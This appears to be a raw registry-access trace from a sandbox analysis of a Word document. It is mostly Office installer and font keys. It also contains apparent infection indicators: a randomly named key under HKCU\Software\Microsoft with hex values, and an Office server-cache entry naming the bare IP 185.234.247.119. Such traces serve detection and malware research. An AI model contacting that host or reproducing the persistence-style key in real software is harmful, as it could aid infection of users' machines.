HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100C0400000000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F100A0C00000000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109F10090400000000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Name
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Path
HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Office\16.0\Word\Text Converters\Import
Extensions
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Resiliency\DocumentRecovery\27611
27611
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Reading Locations\Document 0
Datetime
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
mh.
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
nh.
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMaintenanceGuid
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
TimeCacheMaintenanceStart
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\FileIO
CacheMigrationAttempted
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
AceFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109E60090400000000000F01FEC\Usage
AceFilesIntl_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
WxpFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
$r8
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\SyncProc\Resiliency\StartupItems
%r8
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00006109110000000000000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
en-US
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
4084f577
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
751b2539
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
775a0545
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
cfe66220
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
b2ee2daa
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
a524acf
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
cda7425c
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
3fcd9a81
HKEY_CURRENT_USER\Software\Microsoft\Xyuoiygeo
4084f577
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
mg(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
eh(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
1k(
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache
Version
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\Internet\Server Cache\http://185.234.247.119/
EnableBHO
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\ReviewCycle
ReviewToken
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{E7E4BC40-E76A-11CE-A9BB-00AA004AE837} {000214E6-0000-0000-C000-000000000046} 0xFFFF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\68F73
68F73
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
VBAFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
@SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Agency FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aharoni
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Algerian
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Andalus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Angsana New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
AngsanaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Aparajita
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arabic Typesetting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Narrow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Rounded MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Arial Unicode MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Baskerville Old Face
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Batang
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BatangChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bauhaus 93
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bell MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Berlin Sans FB Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bernard MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Blackadder ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bodoni MT Poster Compressed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Book Antiqua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookman Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bookshelf Symbol 7
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Bradley Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Britannic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Broadway
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Browallia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
BrowalliaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Brush Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calibri Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Californian FB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Calisto MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cambria Math
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Candara
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Castellar
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Centaur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Century Schoolbook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Chiller
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Colonna MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Comic Sans MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Consolas
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Constantia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cooper Black
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Copperplate Gothic Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Corbel
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Cordia New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
CordiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Courier New
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Curlz MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DaunPenh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
David
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DFKai-SB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DilleniaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DokChampa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Dotum
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
DotumChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ebrima
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Edwardian Script ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Elephant
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Engravers MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Bold ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Demi ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Light ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Eras Medium ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Estrangelo Edessa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
EucrosiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Euphemia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FangSong
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Felix Titling
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Footlight MT Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Forte
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Book
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Demi Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Heavy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Franklin Gothic Medium Cond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FrankRuehl
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
FreesiaUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Freestyle Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
French Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gabriola
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Garamond
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gautami
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Georgia
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gigi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans MT Ext Condensed Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gill Sans Ultra Bold Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gisha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gloucester MT Extra Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Old Style
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Goudy Stout
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gulim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GulimChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Gungsuh
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
GungsuhChe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Haettenschweiler
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harlow Solid Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Harrington
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
High Tower Text
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Impact
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Imprint MT Shadow
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Informal Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
IrisUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Iskoola Pota
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
JasmineUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Jokerman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Juice ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KaiTi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kalinga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kartika
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Khmer UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
KodchiangUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kokila
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kristen ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Kunstler Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lao UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Latha
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Leelawadee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Levenim MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
LilyUPC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Bright
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Calligraphy
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Console
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Fax
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Handwriting
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Typewriter
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Lucida Sans Unicode
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Magneto
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Maiandra GD
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Malgun Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mangal
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Marlett
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Matura MT Script Capitals
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Meiryo UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Himalaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft JhengHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft New Tai Lue
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft PhagsPa
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Tai Le
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Uighur
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft YaHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Microsoft Yi Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU_HKSCS-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
